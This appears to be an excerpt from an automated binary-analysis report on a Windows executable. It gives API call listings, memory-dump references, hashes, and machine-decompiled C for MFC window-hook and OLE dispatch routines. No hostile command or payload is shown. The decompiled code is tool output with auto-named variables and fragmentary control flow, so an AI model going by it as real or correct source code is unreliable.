0x00401b17
0x00401b18
0x00401b19
0x00401b2b

APIs

Part of subcall function 00414935: __EH_prolog3_GS.LIBCMT ref: 0041493F
Part of subcall function 00414935: _memset.LIBCMT ref: 00414992
Part of subcall function 00414935: GetVersionExA.KERNEL32(?), ref: 004149A7
Part of subcall function 00414935: _malloc.LIBCMT ref: 004149D0
Part of subcall function 00414935: _memset.LIBCMT ref: 004149E7

Part of subcall function 00414809: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,0040150E,00000001,00000000,00000000,00000006,00442798,00000000,00000000,765B253D), ref: 00414817
Part of subcall function 00414809: _memset.LIBCMT ref: 00414830
Part of subcall function 00414809: GetFocus.USER32 ref: 00414838
Part of subcall function 00414809: IsWindowEnabled.USER32(?), ref: 00414865
Part of subcall function 00414809: EnableWindow.USER32(?,00000000), ref: 00414878
Part of subcall function 00414809: EnableWindow.USER32(?,00000001), ref: 004148C1
Part of subcall function 00414809: IsWindow.USER32(?), ref: 004148C7
Part of subcall function 00414809: SetFocus.USER32(?), ref: 004148D5

Part of subcall function 00414AE1: __EH_prolog3.LIBCMT ref: 00414AE8
Part of subcall function 00414AE1: GetParent.USER32(?), ref: 00414B38
Part of subcall function 00414AE1: SendMessageA.USER32(?,00000464,00000104,?), ref: 00414B4C
Part of subcall function 00414AE1: GetParent.USER32(?), ref: 00414B7F
Part of subcall function 00414AE1: SendMessageA.USER32(?,00000465,00000104,?), ref: 00414B93

Part of subcall function 00401C50: _memcpy_s.LIBCMT ref: 00401C9C

Part of subcall function 00401C50: FindResourceA.KERNEL32(?,00000034,00000005), ref: 0040CA05
Part of subcall function 00401C50: LoadResource.KERNEL32(?,00000000,?,?,00000030,004136DE,?), ref: 0040CA0D
Part of subcall function 00401C50: FreeResource.KERNEL32(00000000,00000000,?,?,?,?,00000030,004136DE,?), ref: 0040CA25

__localtime64_s.LIBCMT ref: 0040160D
__localtime64_s.LIBCMT ref: 00401638
__localtime64_s.LIBCMT ref: 00401666
__localtime64_s.LIBCMT ref: 0040168E
__localtime64_s.LIBCMT ref: 004016AF
__localtime64_s.LIBCMT ref: 004016D2
__localtime64_s.LIBCMT ref: 00401730
__localtime64_s.LIBCMT ref: 0040175E
__localtime64_s.LIBCMT ref: 0040178C
__localtime64_s.LIBCMT ref: 004017B4
__localtime64_s.LIBCMT ref: 004017D8
__localtime64_s.LIBCMT ref: 004017FF
__localtime64_s.LIBCMT ref: 0040185A
__localtime64_s.LIBCMT ref: 00401888
__localtime64_s.LIBCMT ref: 004018B6
__localtime64_s.LIBCMT ref: 004018DE
__localtime64_s.LIBCMT ref: 00401902
__localtime64_s.LIBCMT ref: 00401929

Strings

, xrefs: 00401A02

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __localtime64_s$Window$Resource_memset$EnableFocusMessageParentSend$EnabledFindFreeH_prolog3H_prolog3_LoadVersion_malloc_memcpy_slstrlen
String ID:
API String ID: 915173238-3916222277
Opcode ID: f5643f16cb7d55d40d33a416688b557e77cd7bb80f3844ccd55e3e44615ea999
Instruction ID: 46130d15622264611ec9feb4a2d0b772762c042380647e8a66011a9b99524e8b
Opcode Fuzzy Hash: f5643f16cb7d55d40d33a416688b557e77cd7bb80f3844ccd55e3e44615ea999
Instruction Fuzzy Hash: F502C6715083809BD324DB65CC81F9BB3E8AFD4354F044B2EF599932E1E778A905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00412666, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00412666(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E00427243(E0043A1F1, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E0040D295);
				 *(_t117 - 0x120) = _t111;
				_t54 = E0041720B(_t94, 0x450cbc, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E00415838(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E0040E67F(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x452a38;
						if( *0x452a38 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x452654;
								if( *0x452654 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x452654; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E00412522);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E004277B0(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040F909(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x452654 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E00426243(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0040E6CB(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E00410E83(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E00411580);
							__eflags = _t83 - E00411580;
							if(_t83 != E00411580) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E0040DF8F();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E0040AA7B(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E004272C6(_t94, _t106, _t111);
				}
			}

0x00412666
0x00412666
0x00412666
0x00412670
0x00412675
0x00412678
0x0041267b
0x00412685
0x0041268b
0x00412692
0x00412694
0x00412697
0x0041269f
0x004126a1
0x004126a1
0x004126aa
0x004126bf
0x004126c1
0x004126c4
0x004126c9
0x004126cb
0x004126cf
0x004126d5
0x004126ec
0x004126ec
0x004126f3
0x00412740
0x00412740
0x00412742
0x004127aa
0x004127b2
0x004127ee
0x004127fa
0x00412801
0x00412833
0x00412836
0x0041283c
0x0041283e
0x00412841
0x00412849
0x00412850
0x00412852
0x00412854
0x0041285b
0x00412863
0x00412865
0x00412868
0x0041286b
0x00412879
0x00412879
0x00412868
0x00412854
0x0041287f
0x00412885
0x00412891
0x00412897
0x0041289e
0x004128a0
0x004128a5
0x004128ab
0x004128ab
0x004128ab
0x004128ab
0x00000000
0x004128af
0x00000000
0x00412803
0x004127b6
0x004127c1
0x004127cc
0x004127d2
0x004127d8
0x004127d9
0x004127db
0x004127e3
0x004127e6
0x004127ec
0x00412812
0x00412818
0x0041281a
0x00000000
0x00000000
0x00412824
0x00412828
0x0041282d
0x00412831
0x00000000
0x00000000
0x00000000
0x00412831
0x00000000
0x004127ec
0x0041274a
0x0041274f
0x00412756
0x0041275f
0x00412775
0x00412777
0x0041277d
0x0041277f
0x00412781
0x00412781
0x00412789
0x0041278d
0x00412791
0x00412795
0x0041279b
0x0041279e
0x004127a0
0x004127a0
0x00000000
0x00412795
0x004126f8
0x004126fe
0x00412703
0x00000000
0x00000000
0x00412709
0x0041270c
0x00412711
0x0041271e
0x00412722
0x00412728
0x00412728
0x00412731
0x00412736
0x0041273a
0x00000000
0x00000000
0x00000000
0x0041273a
0x004126d7
0x004126de
0x00000000
0x00000000
0x004126e4
0x004126e6
0x00000000
0x00000000
0x00000000
0x004126ac
0x004126b4
0x004128b1
0x004128b6
0x004128b6

APIs

__EH_prolog3_GS.LIBCMT ref: 00412670

Part of subcall function 0041720B: __EH_prolog3.LIBCMT ref: 00417212

CallNextHookEx.USER32(?,?,?,?), ref: 004126B4

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetClassLongA.USER32 ref: 004126F8
GlobalGetAtomNameA.KERNEL32 ref: 00412722
SetWindowLongA.USER32 ref: 00412777
_memset.LIBCMT ref: 004127C1
GetClassLongA.USER32 ref: 004127F1
GetClassNameA.USER32(?,?,00000100), ref: 00412812
GetWindowLongA.USER32 ref: 00412836
GetPropA.USER32 ref: 00412850
SetPropA.USER32 ref: 0041285B
GetPropA.USER32 ref: 00412863
GlobalAddAtomA.KERNEL32 ref: 0041286B
SetWindowLongA.USER32 ref: 00412879
CallNextHookEx.USER32(?,00000003,?,?), ref: 00412891
UnhookWindowsHookEx.USER32(?), ref: 004128A5

Strings

#32768, xrefs: 004127D3, 004127D8, 00412822
ime, xrefs: 0041272B
AfxOldWndProc423, xrefs: 00412849, 0041284E, 00412859, 00412861, 0041286A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: 97ae0c641ff64587212fd83b916603213ca978be730ad98e14fce76326e3f67b
Instruction ID: c477e48c44754b4278aacc20ed32f1acd11f200eb1a26bd58407a09422d9ae4e
Opcode Fuzzy Hash: 97ae0c641ff64587212fd83b916603213ca978be730ad98e14fce76326e3f67b
Instruction Fuzzy Hash: 8761C571900215ABCB21AB62DE49BEF7B78BF14311F100266F805E22D1D778DDA1CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00423C19, Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00423C19(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E004271DA(E0043B586, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E004272B2(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E004277B0(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x43fb38;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E00422542(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E004277B0(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x441db4, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E00423BC2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E0040A3F2(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E00422D09(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E0040A3F2(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M004241A9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E004228AD(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E00415530(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E0040A3C7(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E00423469(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								L004053A0(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								L004053A0(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								L004053A0(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E00429326(_t300 + 0x14, 0x44a184);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E0040A3C7(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E004277B0(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M0042415D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E00422981(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E00422DA3(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E0040A3F2(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M0042410D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E00415700(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E00401E60(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E00415804(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

0x00423c19
0x00423c20
0x00423c25
0x00423c28
0x00423c2c
0x00424105
0x0042410a
0x0042410a
0x00423c32
0x00423c35
0x00423c38
0x00423c3b
0x00423c45
0x00423c48
0x00423c4d
0x00423c53
0x00423c5e
0x00423c5e
0x00423c65
0x00423c6c
0x00423c71
0x00423c78
0x00423c78
0x00423c7b
0x00423c82
0x00423c85
0x00423c88
0x00423c8b
0x00423c8e
0x00423c91
0x00423c95
0x00423c99
0x00423c9a
0x00423eba
0x00423ebe
0x00423ec0
0x00423ec9
0x00423ecb
0x00423ecb
0x00423ed8
0x00423ee0
0x00423ee2
0x00423ef7
0x00423f0e
0x00423f11
0x00423f16
0x00423f1b
0x00423f46
0x00423f46
0x00423f49
0x00423f52
0x00423f55
0x0042402a
0x0042402a
0x00424030
0x004240e7
0x004240ea
0x004240ee
0x004240f3
0x004240f7
0x004240fa
0x004240fc
0x004240ff
0x00424104
0x00000000
0x004240fa
0x0042403a
0x0042405f
0x00424062
0x00424065
0x00424068
0x00000000
0x00000000
0x0042406a
0x00000000
0x0042407b
0x00424082
0x00000000
0x00000000
0x004240df
0x004240e2
0x004240e5
0x00000000
0x00000000
0x0042409a
0x0042409d
0x00000000
0x00000000
0x004240a4
0x004240a7
0x00000000
0x00000000
0x00424087
0x0042408a
0x0042408d
0x0042408f
0x00424092
0x00000000
0x00000000
0x004240b1
0x004240b6
0x004240b9
0x00000000
0x00000000
0x004240c1
0x004240c4
0x004240c6
0x004240ca
0x004240cd
0x00000000
0x00000000
